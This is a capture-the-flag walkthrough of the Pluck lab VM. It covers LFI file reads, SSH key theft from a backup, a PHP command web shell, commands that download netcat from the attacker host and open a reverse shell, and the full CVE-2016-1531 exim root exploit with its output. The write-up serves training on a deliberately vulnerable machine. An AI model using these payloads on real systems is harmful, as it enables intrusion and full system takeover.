Mr_H4sh

Infosec, CTF and more

Pluck Solution

In this post I’m going to show you how to solve the Pluck VM provided by Ryan Oberto.

You can find the VM on this link

192.168.58.1 <== attacker
192.168.58.101 <== victim

I run a nmap scan, and this is what I find:

# Nmap 7.01 scan initiated Mon Mar 13 11:31:21 2017 as: nmap -sT -sV -p- -Pn -n -v -oA nmap_tcp_version_full_192.168.58.101 -T5 192.168.58.101
Nmap scan report for 192.168.58.101
Host is up (0.011s latency).
Not shown: 65531 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.3p1 Ubuntu 1 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
3306/tcp open  mysql   MySQL (unauthorized)
5355/tcp open  unknown
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Mar 13 11:33:22 2017 -- 1 IP address (1 host up) scanned in 121.10 seconds

So, port 80 is open, I open it on a browser and I find a web application. The web application has various links, and each link points to a php page (e.g. About points to about.php). The web application is vulnerable to LFI but not RFI. I check the /etc/passwd file visiting http://192.168.58.101/index.php?page=/etc/passwd and this is what I find:

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
messagebus:x:106:109::/var/run/dbus:/bin/false
mysql:x:107:111:MySQL Server,,,:/nonexistent:/bin/false
lxd:x:108:65534::/var/lib/lxd/:/bin/false
uuidd:x:109:114::/run/uuidd:/bin/false
dnsmasq:x:110:65534:dnsmasq,,,:/var/lib/misc:/bin/false
sshd:x:111:65534::/var/run/sshd:/usr/sbin/nologin
pollinate:x:112:1::/var/cache/pollinate:/bin/false
bob:x:1000:1000:bob,,,:/home/bob:/bin/bash
Debian-exim:x:113:119::/var/spool/exim4:/bin/false
peter:x:1001:1001:,,,:/home/peter:/bin/bash
paul:x:1002:1002:,,,:/home/paul:/usr/bin/pdmenu
backup-user:x:1003:1003:Just to make backups easier,,,:/backups:/usr/local/scripts/backup.sh

I see that the last user has a script instead of a shell. I visit the URL http://192.168.58.101/index.php?page=/usr/local/scripts/backup.sh and this is what I find:

#!/bin/bash

########################
# Server Backup script #
########################

#Backup directories in /backups so we can get it via tftp

echo `Backing up data`
tar -cf /backups/backup.tar /home /var/www/html > /dev/null 2& > /dev/null
echo `Backup complete`

The home folder of the user backup-user is /backups, and this script is making a backup of the web application in /backups/backup.tar. I download the file /backups/backup.tar using the following command:

# wget http://192.168.58.101/index.php?page=/backups/backup.tar
--2017-03-13 11:45:18--  http://192.168.58.101/index.php?page=/backups/backup.tar
Connecting to 192.168.58.101:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/html]
Saving to: ‘index.php?page=%2Fbackups%2Fbackup.tar’

index.php?page=%2Fb     [         <=>        ]   6.23G  64.2MB/s    in 93s     

2017-03-13 11:46:51 (68.2 MB/s) - Read error at byte 6685945954 (Success).Retrying.

The download breaks after various attempts, but then I stop it. I see that the file has been downloaded anyway, so I try to make it as tar and decompress it. The file gets not fully decompressed, but it’s enough to go ahead:

# mv index.php\?page\=%2Fbackups%2Fbackup.tar backup.tar
# tar -xvf backup.tar 
tar: This does not look like a tar archive
tar: Skipping to next header
ome/bob/.sudo_as_admin_successful
tar: Skipping to next header
home/
home/bob/
home/bob/.bashrc
home/bob/.sudo_as_admin_successful
home/bob/.profile
home/bob/.bash_logout
home/paul/
home/paul/keys/
home/paul/keys/id_key3.pub
home/paul/keys/id_key2.pub
home/paul/keys/id_key2
home/paul/keys/id_key4.pub
home/paul/keys/id_key5.pub
home/paul/keys/id_key6
home/paul/keys/id_key1
home/paul/keys/id_key5
home/paul/keys/id_key1.pub
home/paul/keys/id_key6.pub
home/paul/keys/id_key4
home/paul/keys/id_key3
home/paul/.bashrc
home/paul/.profile
home/paul/.bash_logout
home/peter/
home/peter/.bashrc
home/peter/.profile
home/peter/.bash_logout
var/www/html/
var/www/html/fonts/
var/www/html/fonts/glyphicons-halflings-regular.svg
var/www/html/fonts/glyphicons-halflings-regular.woff2
var/www/html/fonts/glyphicons-halflings-regular.ttf
var/www/html/fonts/glyphicons-halflings-regular.woff
var/www/html/fonts/glyphicons-halflings-regular.eot
var/www/html/about.php
var/www/html/index.php
tar: Skipping to next header
ome/bob/.sudo_as_admin_successful
tar: Skipping to next header

I get into /home/paul/keys and I find a bunch of ssh keys. I try to ssh to the victim machine using paul as user and the keys, and I find out that the id_key4.pub asks for a passphrase, but the id_key4 doesn’t:

# /home/paul/keys# ls -l
total 29
-rwxrwxrwx 1 anthony anthony  668 Jan 18 18:08 id_key1
-rwxrwxrwx 1 anthony anthony  600 Jan 18 18:08 id_key1.pub
-rwxrwxrwx 1 anthony anthony  672 Jan 18 18:08 id_key2
-rwxrwxrwx 1 anthony anthony  600 Jan 18 18:08 id_key2.pub
-rwxrwxrwx 1 anthony anthony  668 Jan 18 18:08 id_key3
-rwxrwxrwx 1 anthony anthony  600 Jan 18 18:08 id_key3.pub
-rwxrwxrwx 1 anthony anthony 1679 Jan 18 18:09 id_key4
-rwxrwxrwx 1 anthony anthony  392 Jan 18 18:09 id_key4.pub
-rwxrwxrwx 1 anthony anthony  668 Jan 18 18:08 id_key5
-rwxrwxrwx 1 anthony anthony  600 Jan 18 18:08 id_key5.pub
-rwxrwxrwx 1 anthony anthony 1675 Jan 18 18:09 id_key6
-rwxrwxrwx 1 anthony anthony  392 Jan 18 18:09 id_key6.pub

# chmod 700 /home/paul/keys/
# chmod 600 /home/paul/keys/*
# ssh -i id_key1 paul@192.168.58.101
The authenticity of host '192.168.58.101 (192.168.58.101)' can't be established.
ECDSA key fingerprint is SHA256:bNvu4Av4Bhl0MM7y9oSir/U4GlOayJaxliMmqVkMqTc.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.58.101' (ECDSA) to the list of known hosts.
paul@192.168.58.101's password: 

/keys# ssh -i id_key2 paul@192.168.58.101
paul@192.168.58.101's password: 

/keys# ssh -i id_key2.pub paul@192.168.58.101
paul@192.168.58.101's password: 

/keys# ssh -i id_key3.pub paul@192.168.58.101
paul@192.168.58.101's password: 

/keys# ssh -i id_key4.pub paul@192.168.58.101
Enter passphrase for key 'id_key4.pub': 
Enter passphrase for key 'id_key4.pub': 
Enter passphrase for key 'id_key4.pub': 
paul@192.168.58.101's password: 

/keys# ssh -i id_key4 paul@192.168.58.101
Welcome to Pdmenu 1.3.4 by Joey Hess <joey@kitenet.net>

The system has the following functionalities:

- Directory listing
- Change directory
- Edit file
- Who's online?
- WWW
- Telnet
- Ping

I change the directory listing to /var/www/html to add a PHP backdoor, but the folder does not have writing permissions. So I change the directory to /tmp and I add a reverse shell script in PHP in there to run through the web browser, since it’s vulnerable to LFI:

# /tmp/shell.php
<?php

if(isset($_REQUEST['cmd'])){
        echo `<pre>`;
        $cmd = ($_REQUEST['cmd']);
        system($cmd);
        echo `</pre>`;
        die;
}

?>

Then I visit the URL http://192.168.58.101/index.php?cmd=id&page=/tmp/shell.php and I get command execution. I visit the URL http://192.168.58.101/index.php?cmd=wget%20-O%20/tmp/nc%20http://192.168.58.1:8081/nc&page=/tmp/shell.php to download the netcat version with execution option on the machine in the /tmp folder, then I visit http://192.168.58.101/index.php?cmd=chmod%20777%20/tmp/nc&page=/tmp/shell.php to add execution permissions and then I visit the URL http://192.168.58.101/index.php?cmd=/tmp/nc%20192.168.58.1%204444%20-e%20/bin/bash&page=/tmp/shell.php to get a reverse shell, and this is what I get:

# nc -lnvp 4444
Listening on [0.0.0.0] (family 0, port 4444)
Connection from [192.168.58.101] port 4444 [tcp/*] accepted (family 2, sport 51056)
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
pwd
/var/www/html
uname -a
Linux pluck 4.8.0-22-generic #24-Ubuntu SMP Sat Oct 8 09:15:00 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
cat /etc/*-release
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=16.10
DISTRIB_CODENAME=yakkety
DISTRIB_DESCRIPTION=`Ubuntu 16.10`
NAME=`Ubuntu`
VERSION=`16.10 (Yakkety Yak)`
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME=`Ubuntu 16.10`
VERSION_ID=`16.10`
HOME_URL=`http://www.ubuntu.com/`
SUPPORT_URL=`http://help.ubuntu.com/`
BUG_REPORT_URL=`http://bugs.launchpad.net/ubuntu/`
PRIVACY_POLICY_URL=`http://www.ubuntu.com/legal/terms-and-policies/privacy-policy`
VERSION_CODENAME=yakkety
UBUNTU_CODENAME=yakkety

The shell is a bit unstable, but better than nothing.

I make some research and I find that within the files that has the SUID, and this is what I found:

# find / -perm -4000 2>/dev/null
/usr/exim/bin/exim-4.84-7
/usr/bin/passwd
/usr/bin/at
/usr/bin/newgrp
/usr/bin/pkexec
/usr/bin/sudo
/usr/bin/traceroute6.iputils
/usr/bin/newuidmap
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/newgidmap
/usr/bin/chsh
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/s-nail/s-nail-privsep
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/bin/su
/bin/umount
/bin/mount
/bin/fusermount
/bin/ping
/bin/ntfs-3g

I search online for exploits for exim-4.84-7, and I find the following URL: https://www.exploit-db.com/exploits/39535/

I put the body of the exploit in a file and download it into the machine, change the permissions then execute it. This exploit elevated my user to root:

# cat exploit.sh
#!/bin/sh
# CVE-2016-1531 exim <= 4.84-3 local root exploit
# ===============================================
# you can write files as root or force a perl module to
# load by manipulating the perl environment and running
# exim with the `perl_startup` arguement -ps. 
#
# e.g.
# [fantastic@localhost tmp]$ ./cve-2016-1531.sh 
# [ CVE-2016-1531 local root exploit
# sh-4.3# id
# uid=0(root) gid=1000(fantastic) groups=1000(fantastic)
# 
# -- Hacker Fantastic 
echo [ CVE-2016-1531 local root exploit
cat > /tmp/root.pm << EOF
package root;
use strict;
use warnings;
 
system(`/bin/sh`);
EOF
PERL5LIB=/tmp PERL5OPT=-Mroot /usr/exim/bin/exim -ps

# chmod +x exploit.sh
chmod +x exploit.sh

# ./exploit.sh
./exploit.sh
[ CVE-2016-1531 local root exploit
id
uid=0(root) gid=33(www-data) groups=33(www-data)
cd /root  
ls -la
total 48
drwx------  2 root root  4096 Jan 25 13:28 .
drwxr-xr-x 23 root root  4096 Jan 18 11:14 ..
-rw-------  1 root root     1 Jan 20 08:58 .bash_history
-rw-r--r--  1 root root  3106 Oct 22  2015 .bashrc
-rw-------  1 root root    84 Jan 20 09:00 .lesshst
-rw-------  1 root root    81 Jan 18 12:00 .mysql_history
-rw-r--r--  1 root root   148 Aug 17  2015 .profile
-rw-------  1 root root 10539 Jan 25 13:28 .viminfo
-rw-r--r--  1 root root   209 Jan 18 19:40 .wget-hsts
-rw-r--r--  1 root root   599 Jan 19 06:07 flag.txt
cat flag.txt

Congratulations you found the flag

---------------------------------------

######   ((((((((((((((((((((((((((((((
#########   (((((((((((((((((((((((((((
,,##########   ((((((((((((((((((((((((
@@,,,##########   (((((((((((((((((((((
@@@@@,,,##########                     
@@@@@@@@,,,############################
@@@@@@@@@@@,,,#########################
@@@@@@@@@,,,###########################
@@@@@@,,,##########                    
@@@,,,##########   &&&&&&&&&&&&&&&&&&&&
,,,##########   &&&&&&&&&&&&&&&&&&&&&&&
##########   &&&&&&&&&&&&&&&&&&&&&&&&&&
#######   &&&&&&&&&&&&&&&&&&&&&&&&&&&&&

Thank you to Ryan Oberto for the VM and Vulnhub for hosting it. For any information or comment, please do not hesitate to leave a comment.